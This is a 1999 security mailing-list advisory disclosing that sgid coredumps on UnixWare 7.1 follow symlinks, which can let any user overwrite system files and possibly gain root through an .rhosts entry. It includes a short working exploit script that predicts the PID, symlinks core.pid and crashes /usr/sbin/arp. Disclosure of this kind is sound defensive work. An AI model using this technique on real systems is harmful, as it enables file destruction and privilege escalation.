mailing list archives
UnixWare coredumps follow symlinks
From: btellier () USA NET (Brock Tellier)
Date: Thu, 2 Dec 1999 19:07:20 MST
Any user may cause system files to be overwritten with coredump data. A full
root compromise may be possible.
All my testing was done on UnixWare 7.1 though I would imagine 7.x is
vulnerable as well.
UnixWare's sgid binaries are allowed to dump core (but suids are not). By
"calculating" the pid of the sgid binary we will call, we can create a symlink
from ./core.pid to any file which would be writable by the running group.
Many of the sgid binaries are sgid-sys, an extremely sensitive gid to be able
to play around with. My arp exploit attached below demonstrates how one would
overwrite a file using this vulnerability.
Why is a root compromise possible? Well, assuming that we could somehow get
"+ +" on a line by itself in the corefile, we could place this into the
.rhosts file of some group writable directory/.rhosts. Gaining the additional
privileges of any system account is usually a fast ticket to root.
# Exploit for UnixWare 7.1 - sgid coredumps follow symlinks.
# Guessing pid is trivial. Any sgid program which will coredump can be used
# -Brock Tellier, btellier () usa net
pid=`expr $$ + 4`;
ln -s /path/to/sys/group/writable/file core.$pid
/usr/sbin/arp `perl -e "print 'A' x 10000"`
UNIX Systems Administrator
Chicago, IL, USA
btellier () usa net
Get free email and a permanent address at http://www.netaddress.com/?N=1